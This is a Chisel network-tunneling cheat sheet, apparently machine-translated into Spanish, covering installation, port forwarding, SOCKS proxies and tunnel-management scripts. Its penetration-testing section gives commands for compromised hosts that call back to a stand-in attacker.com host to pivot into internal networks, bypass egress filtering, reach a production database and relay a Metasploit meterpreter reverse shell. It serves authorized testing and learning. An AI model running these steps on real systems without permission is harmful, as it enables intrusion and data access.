Chisel Cheat Sheet
"Clase de la hoja" idbutton id="chisel-copy-btn" class="copy-btn" onclick="copyAllCommands()" Copiar todos los comandos id="chisel-pdf-btn" class="pdf-btn" onclick="generatePDF()" Generar PDF seleccionado/button ■/div titulada
Sinopsis
Chisel es un túnel TCP/UDP rápido, transportado sobre HTTP, asegurado a través de SSH. Es una poderosa herramienta para el pivote de red, el reenvío de puertos y el paso de cortafuegos. Escrito en Go, Chisel está diseñado para ser ligero, multiplataforma y fácil de desplegar. Es particularmente útil en escenarios de pruebas de penetración donde necesita establecer túneles seguros a través de entornos de red restrictivos.
NOVEDAD Advertencia: Únicamente utilice Chisel en entornos que posee o tenga permiso explícito para probar. El uso no autorizado puede violar términos de servicio o leyes locales.
Instalación
Binarios precompilados
# Download latest release for Linux
wget https://github.com/jpillora/chisel/releases/latest/download/chisel_1.9.1_linux_amd64.gz
gunzip chisel_1.9.1_linux_amd64.gz
chmod +x chisel_1.9.1_linux_amd64
sudo mv chisel_1.9.1_linux_amd64 /usr/local/bin/chisel
# Download for Windows
wget https://github.com/jpillora/chisel/releases/latest/download/chisel_1.9.1_windows_amd64.gz
# Download for macOS
wget https://github.com/jpillora/chisel/releases/latest/download/chisel_1.9.1_darwin_amd64.gz
# Verify installation
chisel --version
Paquete Manager Instalación
# Ubuntu/Debian (from snap)
sudo snap install chisel
# macOS with Homebrew
brew install chisel
# Arch Linux (AUR)
yay -S chisel
# Go installation
go install github.com/jpillora/chisel@latest
Recopilación manual
# Install Go if not already installed
wget https://golang.org/dl/go1.21.0.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.0.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin
# Clone and build Chisel
git clone https://github.com/jpillora/chisel.git
cd chisel
go build -ldflags "-s -w" .
# Install binary
sudo mv chisel /usr/local/bin/
Docker Instalación
# Pull Docker image
docker pull jpillora/chisel:latest
# Run Chisel server in Docker
docker run --rm -p 8080:8080 jpillora/chisel:latest server --port 8080
# Create alias for easier usage
echo 'alias chisel="docker run --rm -it --network host jpillora/chisel:latest"' >> ~/.bashrc
source ~/.bashrc
Uso básico
Modo de servidor
# Start basic server
chisel server --port 8080
# Server with authentication
chisel server --port 8080 --auth user:password
# Server with key-based authentication
chisel server --port 8080 --key "your-secret-key"
# Server with reverse tunnels allowed
chisel server --port 8080 --reverse
# Server with specific bind address
chisel server --host 0.0.0.0 --port 8080
# Server with verbose logging
chisel server --port 8080 -v
Modo de cliente
# Basic client connection
chisel client server.example.com:8080
# Client with authentication
chisel client user:password@server.example.com:8080
# Client with key-based authentication
chisel client --auth user:password server.example.com:8080
# Client with verbose logging
chisel client -v server.example.com:8080
# Client with custom fingerprint verification
chisel client --fingerprint "ab:cd:ef:..." server.example.com:8080
Port Forwarding
Local Port Forwarding
# Forward local port 3000 to remote port 80
chisel client server.example.com:8080 3000:target.internal:80
# Forward local port 8080 to remote SSH
chisel client server.example.com:8080 2222:target.internal:22
# Forward local port to remote database
chisel client server.example.com:8080 5432:database.internal:5432
# Multiple port forwards
chisel client server.example.com:8080 3000:web.internal:80 2222:ssh.internal:22
# Forward with specific local interface
chisel client server.example.com:8080 127.0.0.1:3000:target.internal:80
Puerto remoto hacia adelante
# Server must be started with --reverse flag
chisel server --port 8080 --reverse
# Forward remote port 8080 to local port 80
chisel client server.example.com:8080 R:8080:localhost:80
# Forward remote port to local SSH
chisel client server.example.com:8080 R:2222:localhost:22
# Forward remote port to local database
chisel client server.example.com:8080 R:5432:localhost:5432
# Multiple remote forwards
chisel client server.example.com:8080 R:8080:localhost:80 R:2222:localhost:22
Avance dinámico del puerto (SOCKS)
# Create SOCKS5 proxy on local port 1080
chisel client server.example.com:8080 socks
# Create SOCKS5 proxy on custom port
chisel client server.example.com:8080 1080:socks
# Create SOCKS5 proxy with specific interface
chisel client server.example.com:8080 127.0.0.1:1080:socks
# Use the SOCKS proxy
curl --socks5 127.0.0.1:1080 http://internal.target.com
Tunneling avanzado
HTTP Tunneling
# Server configuration for HTTP tunneling
chisel server --port 80 --reverse
# Client connecting through HTTP
chisel client http://server.example.com:80 3000:target.internal:80
# Client with custom headers
chisel client --header "X-Custom: value" server.example.com:8080 3000:target.internal:80
# Client through HTTP proxy
chisel client --proxy http://proxy.company.com:8080 server.example.com:8080 3000:target.internal:80
HTTPS Tunneling
# Server with TLS
chisel server --port 443 --tls-key server.key --tls-cert server.crt
# Client connecting via HTTPS
chisel client https://server.example.com:443 3000:target.internal:80
# Client ignoring certificate errors
chisel client --tls-skip-verify https://server.example.com:443 3000:target.internal:80
# Client with custom CA certificate
chisel client --tls-ca ca.crt https://server.example.com:443 3000:target.internal:80
WebSocket Tunneling
# Server with WebSocket support (default)
chisel server --port 8080
# Client using WebSocket
chisel client ws://server.example.com:8080 3000:target.internal:80
# Client using secure WebSocket
chisel client wss://server.example.com:8080 3000:target.internal:80
# Client with custom WebSocket path
chisel client server.example.com:8080/custom/path 3000:target.internal:80
Penetration Testing Scenarios
Red Pivoting
# Scenario: Access internal network through compromised web server
# 1. On compromised web server (DMZ host)
./chisel client attacker.com:8080 R:9999:127.0.0.1:9999
# 2. On attacker machine
chisel server --port 8080 --reverse
# 3. Create SOCKS proxy through the tunnel
chisel client 127.0.0.1:9999 1080:socks
# 4. Use SOCKS proxy to access internal network
proxychains4 nmap -sT 192.168.1.0/24
curl --socks5 127.0.0.1:1080 http://192.168.1.100
Firewall Bypass
# Scenario: Bypass egress filtering
# 1. Set up Chisel server on external VPS (port 443 for HTTPS)
chisel server --port 443 --tls-cert server.crt --tls-key server.key --reverse
# 2. From internal network, connect to external server
chisel client https://external.vps.com:443 R:8080:127.0.0.1:8080
# 3. Create local SOCKS proxy
chisel client 127.0.0.1:8080 1080:socks
# 4. Route traffic through the tunnel
export https_proxy=socks5://127.0.0.1:1080
curl https://blocked-site.com
Acceso a la base de datos
# Scenario: Access internal database through web application server
# 1. On web application server
chisel client attacker.com:8080 R:5432:database.internal:5432
# 2. On attacker machine
chisel server --port 8080 --reverse
# 3. Connect to database through tunnel
psql -h 127.0.0.1 -p 5432 -U dbuser -d production
# 4. Or create persistent tunnel
chisel client 127.0.0.1:8080 5432:database.internal:5432
Multi-hop Tunneling
# Scenario: Chain multiple tunnels for deep network access
# 1. First hop: Attacker -> DMZ Server
chisel server --port 8080 --reverse # On attacker machine
chisel client attacker.com:8080 R:9001:127.0.0.1:9001 # On DMZ server
# 2. Second hop: DMZ Server -> Internal Server
chisel server --port 9001 --reverse # On DMZ server
chisel client 127.0.0.1:9001 R:9002:127.0.0.1:9002 # On internal server
# 3. Final access: Create SOCKS proxy
chisel client 127.0.0.1:9002 1080:socks # On attacker machine
# 4. Access deep internal resources
curl --socks5 127.0.0.1:1080 http://deep.internal.network
Scripts de automatización
Tunnel Management Script
#!/bin/bash
# Chisel tunnel management script
CHISEL_SERVER="server.example.com:8080"
CHISEL_AUTH="user:password"
PID_DIR="/tmp/chisel_pids"
LOG_DIR="/tmp/chisel_logs"
mkdir -p "$PID_DIR" "$LOG_DIR"
start_tunnel() \\\\{
local name="$1"
local tunnel_spec="$2"
local pid_file="$PID_DIR/$\\\\{name\\\\}.pid"
local log_file="$LOG_DIR/$\\\\{name\\\\}.log"
if [ -f "$pid_file" ] && kill -0 "$(cat "$pid_file")" 2>/dev/null; then
echo "Tunnel '$name' is already running (PID: $(cat "$pid_file"))"
return 1
fi
echo "Starting tunnel: $name"
chisel client --auth "$CHISEL_AUTH" "$CHISEL_SERVER" "$tunnel_spec" \
> "$log_file" 2>&1 &
echo $! > "$pid_file"
echo "Tunnel '$name' started (PID: $!)"
\\\\}
stop_tunnel() \\\\{
local name="$1"
local pid_file="$PID_DIR/$\\\\{name\\\\}.pid"
if [ ! -f "$pid_file" ]; then
echo "Tunnel '$name' is not running"
return 1
fi
local pid=$(cat "$pid_file")
if kill -0 "$pid" 2>/dev/null; then
kill "$pid"
rm "$pid_file"
echo "Tunnel '$name' stopped"
else
echo "Tunnel '$name' was not running (removing stale PID file)"
rm "$pid_file"
fi
\\\\}
status_tunnel() \\\\{
local name="$1"
local pid_file="$PID_DIR/$\\\\{name\\\\}.pid"
if [ -f "$pid_file" ] && kill -0 "$(cat "$pid_file")" 2>/dev/null; then
echo "Tunnel '$name' is running (PID: $(cat "$pid_file"))"
else
echo "Tunnel '$name' is not running"
fi
\\\\}
list_tunnels() \\\\{
echo "Active tunnels:"
for pid_file in "$PID_DIR"/*.pid; do
if [ -f "$pid_file" ]; then
local name=$(basename "$pid_file" .pid)
status_tunnel "$name"
fi
done
\\\\}
case "$1" in
start)
if [ $# -ne 3 ]; then
echo "Usage: $0 start <name> <tunnel_spec>"
echo "Example: $0 start web 3000:internal.web:80"
exit 1
fi
start_tunnel "$2" "$3"
;;
stop)
if [ $# -ne 2 ]; then
echo "Usage: $0 stop <name>"
exit 1
fi
stop_tunnel "$2"
;;
status)
if [ $# -ne 2 ]; then
echo "Usage: $0 status <name>"
exit 1
fi
status_tunnel "$2"
;;
list)
list_tunnels
;;
*)
echo "Usage: $0 \\\\{start|stop|status|list\\\\}"
echo ""
echo "Commands:"
echo " start <name> <spec> Start a named tunnel"
echo " stop <name> Stop a named tunnel"
echo " status <name> Check tunnel status"
echo " list List all tunnels"
exit 1
;;
esac
Auto-Reconnect Script
#!/bin/bash
# Auto-reconnecting Chisel client
CHISEL_SERVER="server.example.com:8080"
CHISEL_AUTH="user:password"
TUNNEL_SPEC="3000:internal.web:80"
RECONNECT_DELAY=10
MAX_RETRIES=0 # 0 = infinite retries
retry_count=0
while true; do
echo "[$(date)] Starting Chisel client..."
chisel client --auth "$CHISEL_AUTH" "$CHISEL_SERVER" "$TUNNEL_SPEC"
exit_code=$?
echo "[$(date)] Chisel client exited with code: $exit_code"
if [ $MAX_RETRIES -gt 0 ] && [ $retry_count -ge $MAX_RETRIES ]; then
echo "[$(date)] Maximum retries ($MAX_RETRIES) reached. Exiting."
exit 1
fi
retry_count=$((retry_count + 1))
echo "[$(date)] Retry $retry_count. Reconnecting in $RECONNECT_DELAY seconds..."
sleep $RECONNECT_DELAY
done
Health Check Script
#!/bin/bash
# Chisel tunnel health check
TUNNEL_NAME="$1"
TEST_HOST="$2"
TEST_PORT="$3"
SOCKS_PORT="$\\\\{4:-1080\\\\}"
if [ $# -lt 3 ]; then
echo "Usage: $0 <tunnel_name> <test_host> <test_port> [socks_port]"
echo "Example: $0 web internal.web 80 1080"
exit 1
fi
check_tunnel_process() \\\\{
pgrep -f "chisel.*$TUNNEL_NAME" >/dev/null
\\\\}
check_socks_proxy() \\\\{
nc -z 127.0.0.1 "$SOCKS_PORT" 2>/dev/null
\\\\}
check_target_connectivity() \\\\{
timeout 10 curl -s --socks5 "127.0.0.1:$SOCKS_PORT" \
"http://$TEST_HOST:$TEST_PORT" >/dev/null 2>&1
\\\\}
echo "Checking tunnel health: $TUNNEL_NAME"
# Check if tunnel process is running
if check_tunnel_process; then
echo "✓ Tunnel process is running"
else
echo "✗ Tunnel process is not running"
exit 1
fi
# Check if SOCKS proxy is listening
if check_socks_proxy; then
echo "✓ SOCKS proxy is listening on port $SOCKS_PORT"
else
echo "✗ SOCKS proxy is not listening on port $SOCKS_PORT"
exit 1
fi
# Check target connectivity
if check_target_connectivity; then
echo "✓ Target $TEST_HOST:$TEST_PORT is reachable through tunnel"
else
echo "✗ Target $TEST_HOST:$TEST_PORT is not reachable through tunnel"
exit 1
fi
echo "All health checks passed!"
Configuración de túneles por lotes
#!/bin/bash
# Set up multiple tunnels from configuration file
CONFIG_FILE="$\\\\{1:-tunnels.conf\\\\}"
if [ ! -f "$CONFIG_FILE" ]; then
echo "Configuration file not found: $CONFIG_FILE"
echo "Creating example configuration..."
cat > "$CONFIG_FILE" << 'EOF'
# Chisel tunnel configuration
# Format: name|server|auth|tunnel_spec
web|server.example.com:8080|user:pass|3000:internal.web:80
ssh|server.example.com:8080|user:pass|2222:internal.ssh:22
db|server.example.com:8080|user:pass|5432:internal.db:5432
socks|server.example.com:8080|user:pass|1080:socks
EOF
echo "Example configuration created: $CONFIG_FILE"
echo "Edit the file and run the script again."
exit 1
fi
echo "Setting up tunnels from: $CONFIG_FILE"
while IFS='|' read -r name server auth tunnel_spec; do
# Skip comments and empty lines
[[ "$name" =~ ^#.*$ ]] && continue
[[ -z "$name" ]] && continue
echo "Starting tunnel: $name"
chisel client --auth "$auth" "$server" "$tunnel_spec" \
> "/tmp/chisel_$\\\\{name\\\\}.log" 2>&1 &
echo $! > "/tmp/chisel_$\\\\{name\\\\}.pid"
echo " PID: $!"
echo " Log: /tmp/chisel_$\\\\{name\\\\}.log"
sleep 2
done ``< "$CONFIG_FILE"
echo "All tunnels started. Use 'ps aux|grep chisel' to verify."
Integración con Herramientas de Seguridad
Integración Metasploit
# Set up reverse tunnel for Metasploit payload
# 1. On target machine
chisel client attacker.com:8080 R:4444:127.0.0.1:4444
# 2. On attacker machine
chisel server --port 8080 --reverse
# 3. In Metasploit
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
run
SSH Tunneling
# Replace SSH tunneling with Chisel
# Traditional SSH tunnel:
# ssh -L 3000:internal.web:80 user@jumphost
# Equivalent Chisel tunnel:
chisel server --port 8080 --reverse # On jumphost
chisel client jumphost:8080 3000:internal.web:80 # On local machine
# Dynamic SSH tunnel replacement:
# ssh -D 1080 user@jumphost
# Equivalent Chisel SOCKS proxy:
chisel client jumphost:8080 1080:socks
Burp Suite Integration
# Set up Chisel SOCKS proxy for Burp Suite
chisel client server.example.com:8080 1080:socks
# Configure Burp Suite to use SOCKS proxy:
# 1. Go to User options >`` Connections > SOCKS Proxy
# 2. Check "Use SOCKS proxy"
# 3. SOCKS host: 127.0.0.1
# 4. SOCKS port: 1080
# Or use Burp's upstream proxy settings:
# 1. Go to User options > Connections > Upstream Proxy Servers
# 2. Add rule for target host
# 3. Proxy host: 127.0.0.1
# 4. Proxy port: 1080
# 5. Proxy type: SOCKS
Solución de problemas
Cuestiones comunes
Problemas de conexión
# Test server connectivity
nc -zv server.example.com 8080
# Check if server is running
chisel server --port 8080 -v
# Test with verbose client
chisel client -v server.example.com:8080
# Check firewall rules
sudo ufw status
sudo iptables -L
Cuestiones de autenticación
# Test authentication
chisel client --auth user:password server.example.com:8080
# Check server authentication settings
chisel server --port 8080 --auth user:password -v
# Use key-based authentication
chisel server --port 8080 --key "secret-key"
chisel client --auth user:secret-key server.example.com:8080
Cuestiones relativas al túnel
# Test local port binding
netstat -tlnp|grep :3000
# Test target connectivity from server
nc -zv target.internal 80
# Check tunnel specification syntax
chisel client server.example.com:8080 3000:target.internal:80 -v
# Test SOCKS proxy
curl --socks5 127.0.0.1:1080 http://httpbin.org/ip
Cuestiones de ejecución
# Monitor tunnel performance
iftop -i any
nethogs
# Check system resources
top
htop
# Optimize tunnel settings
chisel client --keepalive 30s server.example.com:8080 3000:target.internal:80
# Use compression (if available)
chisel client --compress server.example.com:8080 3000:target.internal:80
Debugging y Logging
# Enable verbose logging
chisel server --port 8080 -v
chisel client -v server.example.com:8080 3000:target.internal:80
# Log to file
chisel server --port 8080 -v 2>&1|tee server.log
chisel client -v server.example.com:8080 3000:target.internal:80 2>&1|tee client.log
# Monitor network traffic
sudo tcpdump -i any -n host server.example.com
sudo tcpdump -i any -n port 8080
# Check system logs
journalctl -f|grep chisel
tail -f /var/log/syslog|grep chisel
Recursos
- Repositorio Oficial de Chisel
- Chisel Documentation
- Go Programming Language
- Protocolo web
- HTTP CONNECT Method
- Tecnicas de Tunneling de Red
- Penetration Testing Tunneling
-...
*Esta hoja de trampa proporciona una referencia completa para el uso de Chisel para túneles TCP/UDP y pivote de red. Siempre asegúrese de tener una autorización adecuada antes de usar esta herramienta en cualquier entorno. *